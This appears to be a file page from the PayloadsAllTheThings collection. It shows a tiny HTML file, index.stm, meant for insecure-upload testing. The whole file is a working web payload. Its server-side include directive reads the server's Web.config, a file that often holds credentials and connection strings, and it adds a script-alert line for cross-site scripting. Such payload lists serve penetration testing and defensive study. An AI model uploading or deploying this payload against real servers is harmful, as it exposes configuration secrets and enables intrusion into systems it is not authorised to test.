PayloadsAllTheThings/Upload Insecure Files/Server Side Include/index.stm

15 lines
197 B
Plaintext
Raw Normal View History

2017-11-09 08:05:50 +00:00
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title></title>
</head>
<body>
<!-- #include file = "Web.config" -->
<script>alert('XSS')</script>
</body>
</html>